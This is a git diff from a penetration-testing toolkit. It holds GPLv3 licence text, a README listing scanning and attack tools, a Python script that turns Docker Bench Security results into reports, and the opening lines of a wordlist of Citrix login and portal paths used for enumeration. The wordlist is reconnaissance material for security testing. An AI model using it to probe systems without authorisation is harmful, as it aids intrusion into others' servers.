+measures. 
+ + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. 
This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. 
+ + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. 
If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. 
If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. 
+ + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. 
For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. 
+ + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. 
You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. 
The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. 
+ + {one line to give the program's name and a brief idea of what it does.} + Copyright (C) {year} {name of author} + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + {project} Copyright (C) {year} {fullname} + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. 
diff --git a/README.md b/README.md
index bc44d40..0e31dfe 100644
--- a/README.md
+++ b/README.md
@@ -1,57 +1,57 @@
-## PenTestKit
-
-*Useful tools & scripts during Penetration Testing Engagements*
-
-### Requirements
-
-**OS**
-
-* Tested on Debian 8.x, 9.x & Kali Linux
-
-**Languages & Libraries**
-
-* Python 2.x
-* termcolor (python package)
-* requests (python package)
-* BeautifulSoup (python package)
-* shodan (python package)
-* python-nmap (python package)
-
-**Tools**
-
-* Burp Pro
-* Nessus
-* Nmap
-* Nikto
-* sslscan
-* dirb
-* netdiscover
-* curl
-* netcat (nc)
-* arp-scan
-* p0f
-* stunnel
-* wget
-* socat
-* whatweb
-* sqlmap
-* rsmangler
-* patator
-* host
-* nbtscan
-* enum4linux
-* rpcclient
-* onesixtyone
-* crunch
-* cewl
-* pandoc
-* more..
-
-***
-
-### Download - Installation
-
-```bash
-git clone https://github.com/maldevel/PenTestKit.git
-cd PenTestKit/
-```
+## PenTestKit
+
+*Useful tools & scripts during Penetration Testing Engagements*
+
+### Requirements
+
+**OS**
+
+* Tested on Debian 8.x, 9.x & Kali Linux
+
+**Languages & Libraries**
+
+* Python 2.x
+* termcolor (python package)
+* requests (python package)
+* BeautifulSoup (python package)
+* shodan (python package)
+* python-nmap (python package)
+
+**Tools**
+
+* Burp Pro
+* Nessus
+* Nmap
+* Nikto
+* sslscan
+* dirb
+* netdiscover
+* curl
+* netcat (nc)
+* arp-scan
+* p0f
+* stunnel
+* wget
+* socat
+* whatweb
+* sqlmap
+* rsmangler
+* patator
+* host
+* nbtscan
+* enum4linux
+* rpcclient
+* onesixtyone
+* crunch
+* cewl
+* pandoc
+* more..
+
+***
+
+### Download - Installation
+
+```bash
+git clone https://github.com/maldevel/PenTestKit.git
+cd PenTestKit/
+```
diff --git a/auditing/parse-docker-bench-security-json-file.py b/auditing/parse-docker-bench-security-json-file.py
index 4234c00..8860622 100644
--- a/auditing/parse-docker-bench-security-json-file.py
+++ b/auditing/parse-docker-bench-security-json-file.py
@@ -1,200 +1,200 @@
-#!/usr/bin/python
-# encoding: UTF-8
-
-"""
- This file is part of PenTestKit
- Copyright (C) 2017-1019 @maldevel
- https://github.com/maldevel/PenTestKit
-
- PenTestKit - Useful tools for Penetration Testing.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation, either version 3 of the License, or
- (at your option) any later version.
-
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- GNU General Public License for more details.
-
- You should have received a copy of the GNU General Public License
- along with this program. If not, see .
-
- For more see the file 'LICENSE' for copying permission.
-
-"""
-
-__author__ = "maldevel"
-__copyright__ = "Copyright (c) 2017-2019 @maldevel"
-__credits__ = ["maldevel"]
-__license__ = "GPLv3"
-__version__ = "0.1"
-__maintainer__ = "maldevel"
-
-#######################################################################################################
-
-import sys
-import argparse
-import os
-import json
-
-from argparse import RawTextHelpFormatter
-
-#######################################################################################################
-
-message = """
-Parse Docker-Bench-Security Script JSON files | @maldevel
-Version: {}
-""".format(__version__)
-
-def MainFunc():
- parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter)
-
- parser.add_argument('-j', '--json',
- action='store',
- metavar='jsonfile',
- dest='jsonfile',
- type=str,
- default=None,
- help='Results json file path.')
-
- parser.add_argument('-t', '--type',
- action='store',
- metavar='type',
- dest='type',
- type=str,
- default='all',
- help='Result type(info, pass, warn, note, all).')
-
- parser.add_argument('-f', 
'--filename',
- action='store',
- metavar='filename',
- dest='filename',
- type=str,
- default=None,
- help='Output filename')
-
- parser.add_argument('-o', '--output',
- action='store',
- metavar='directory',
- dest='output',
- type=str,
- default=None,
- help='Output directory path')
-
- if len(sys.argv) is 1:
- parser.print_help()
- sys.exit(1)
-
- args = parser.parse_args()
-
- print (message)
-
- jsonfile = args.jsonfile
- if not os.path.isfile(jsonfile):
- print ('[-] Please provide an existing json file.')
- sys.exit(1)
-
- with open(jsonfile, "r") as f:
- data = json.load(f)
-
- filter = args.type.lower()
-
- filename = args.filename
-
- if filename:
- txtfilename = filename + ".txt"
- mdfilename = filename + ".md"
- htmlfilename = filename + ".html"
- else:
- txtfilename = os.path.basename(jsonfile) + ".txt"
- mdfilename = os.path.basename(jsonfile) + ".md"
- htmlfilename = os.path.basename(jsonfile) + ".html"
-
- output = args.output
-
- if output:
- txtfile = os.path.join(output, '') + txtfilename
- mdfile = os.path.join(output, '') + mdfilename
- htmlfile = os.path.join(output, '') + htmlfilename
- else:
- txtfile = os.path.join(os.path.dirname(jsonfile), '') + txtfilename
- mdfile = os.path.join(os.path.dirname(jsonfile), '') + mdfilename
- htmlfile = os.path.join(os.path.dirname(jsonfile), '') + htmlfilename
-
- with open(txtfile, "w") as txt, open(mdfile, "w") as md, open(htmlfile, "w") as html:
- print('Docker Bench Security {} Results\n'.format(data['dockerbenchsecurity']))
- txt.write('Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity']))
- txt.write('Checks: {}\n'.format(data['checks']))
- txt.write('Score: {}\n\n'.format(data['score']))
-
- md.write('## Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity']))
- md.write('* Checks: {}\n'.format(data['checks']))
- md.write('* Score: {}\n'.format(data['score']))
- md.write('\n')
-
- html.write('Docker Bench Security {} 
Results'.format(data['dockerbenchsecurity'])) - html.write('

Docker Bench Security {} Results

'.format(data['dockerbenchsecurity'])) - html.write('
    ') - html.write('
  • Checks: {}
  • '.format(data['checks'])) - html.write('
  • Score: {}
  • '.format(data['score'])) - html.write('
') - - for test in data['tests']: - print('{}\n'.format(test['desc'])) - txt.write('{}\n\n'.format(test['desc'])) - md.write('### {}\n\n'.format(test['desc'])) - html.write('

{}

'.format(test['desc'])) - - html.write('
    ') - for result in test['results']: - - if result['result'] == 'WARN' and (filter == 'warn' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
  • '.format(result['id'], result['desc'])) - - elif result['result'] == 'INFO' and (filter == 'info' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
  • '.format(result['id'], result['desc'])) - - elif result['result'] == 'PASS' and (filter == 'pass' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
  • '.format(result['id'], result['desc'])) - - elif result['result'] == 'NOTE' and (filter == 'note' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
  • '.format(result['id'], result['desc'])) - - html.write('
') - - print() - txt.write('\n') - md.write('\n---\n\n') - html.write('

')
-
- html.write('')
-
-#######################################################################################################
-
-if __name__ == '__main__':
- try:
- MainFunc()
- except KeyboardInterrupt:
- print ("Interrupted by user..")
- except:
- sys.exit()
-
-#######################################################################################################
+#!/usr/bin/python
+# encoding: UTF-8
+
+"""
+ This file is part of PenTestKit
+ Copyright (C) 2017-1019 @maldevel
+ https://github.com/maldevel/PenTestKit
+
+ PenTestKit - Useful tools for Penetration Testing.
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ For more see the file 'LICENSE' for copying permission. 
+
+"""
+
+__author__ = "maldevel"
+__copyright__ = "Copyright (c) 2017-2019 @maldevel"
+__credits__ = ["maldevel"]
+__license__ = "GPLv3"
+__version__ = "0.1"
+__maintainer__ = "maldevel"
+
+#######################################################################################################
+
+import sys
+import argparse
+import os
+import json
+
+from argparse import RawTextHelpFormatter
+
+#######################################################################################################
+
+message = """
+Parse Docker-Bench-Security Script JSON files | @maldevel
+Version: {}
+""".format(__version__)
+
+def MainFunc():
+ parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter)
+
+ parser.add_argument('-j', '--json',
+ action='store',
+ metavar='jsonfile',
+ dest='jsonfile',
+ type=str,
+ default=None,
+ help='Results json file path.')
+
+ parser.add_argument('-t', '--type',
+ action='store',
+ metavar='type',
+ dest='type',
+ type=str,
+ default='all',
+ help='Result type(info, pass, warn, note, all).')
+
+ parser.add_argument('-f', '--filename',
+ action='store',
+ metavar='filename',
+ dest='filename',
+ type=str,
+ default=None,
+ help='Output filename')
+
+ parser.add_argument('-o', '--output',
+ action='store',
+ metavar='directory',
+ dest='output',
+ type=str,
+ default=None,
+ help='Output directory path')
+
+ if len(sys.argv) is 1:
+ parser.print_help()
+ sys.exit(1)
+
+ args = parser.parse_args()
+
+ print (message)
+
+ jsonfile = args.jsonfile
+ if not os.path.isfile(jsonfile):
+ print ('[-] Please provide an existing json file.')
+ sys.exit(1)
+
+ with open(jsonfile, "r") as f:
+ data = json.load(f)
+
+ filter = args.type.lower()
+
+ filename = args.filename
+
+ if filename:
+ txtfilename = filename + ".txt"
+ mdfilename = filename + ".md"
+ htmlfilename = filename + ".html"
+ else:
+ txtfilename = os.path.basename(jsonfile) + ".txt"
+ mdfilename = os.path.basename(jsonfile) + ".md"
+ htmlfilename = 
os.path.basename(jsonfile) + ".html"
+
+ output = args.output
+
+ if output:
+ txtfile = os.path.join(output, '') + txtfilename
+ mdfile = os.path.join(output, '') + mdfilename
+ htmlfile = os.path.join(output, '') + htmlfilename
+ else:
+ txtfile = os.path.join(os.path.dirname(jsonfile), '') + txtfilename
+ mdfile = os.path.join(os.path.dirname(jsonfile), '') + mdfilename
+ htmlfile = os.path.join(os.path.dirname(jsonfile), '') + htmlfilename
+
+ with open(txtfile, "w") as txt, open(mdfile, "w") as md, open(htmlfile, "w") as html:
+ print('Docker Bench Security {} Results\n'.format(data['dockerbenchsecurity']))
+ txt.write('Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity']))
+ txt.write('Checks: {}\n'.format(data['checks']))
+ txt.write('Score: {}\n\n'.format(data['score']))
+
+ md.write('## Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity']))
+ md.write('* Checks: {}\n'.format(data['checks']))
+ md.write('* Score: {}\n'.format(data['score']))
+ md.write('\n')
+
+ html.write('Docker Bench Security {} Results'.format(data['dockerbenchsecurity']))
+ html.write('

Docker Bench Security {} Results

'.format(data['dockerbenchsecurity'])) + html.write('
    ') + html.write('
  • Checks: {}
  • '.format(data['checks'])) + html.write('
  • Score: {}
  • '.format(data['score'])) + html.write('
') + + for test in data['tests']: + print('{}\n'.format(test['desc'])) + txt.write('{}\n\n'.format(test['desc'])) + md.write('### {}\n\n'.format(test['desc'])) + html.write('

{}

'.format(test['desc'])) + + html.write('
    ') + for result in test['results']: + + if result['result'] == 'WARN' and (filter == 'warn' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
  • '.format(result['id'], result['desc'])) + + elif result['result'] == 'INFO' and (filter == 'info' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
  • '.format(result['id'], result['desc'])) + + elif result['result'] == 'PASS' and (filter == 'pass' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
  • '.format(result['id'], result['desc'])) + + elif result['result'] == 'NOTE' and (filter == 'note' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
  • '.format(result['id'], result['desc'])) + + html.write('
') + + print() + txt.write('\n') + md.write('\n---\n\n') + html.write('

')
+
+ html.write('')
+
+#######################################################################################################
+
+if __name__ == '__main__':
+ try:
+ MainFunc()
+ except KeyboardInterrupt:
+ print ("Interrupted by user..")
+ except:
+ sys.exit()
+
+#######################################################################################################
diff --git a/enumeration/citrix.list b/enumeration/citrix.list
index f97f21a..18ec28d 100644
--- a/enumeration/citrix.list
+++ b/enumeration/citrix.list
@@ -1,65 +1,65 @@
-/Citrix/
-/Citrix/AccessPlatform/auth/
-/Citrix/AccessPlatform/media
-/Citrix/AccessPlatform/auth/login.aspx
-/Citrix/AccessPlatform/site/applist.aspx
-/LogonAgent/Login.asp
-/Citrix/NFuse16/
-/Citrix/NFuse151/
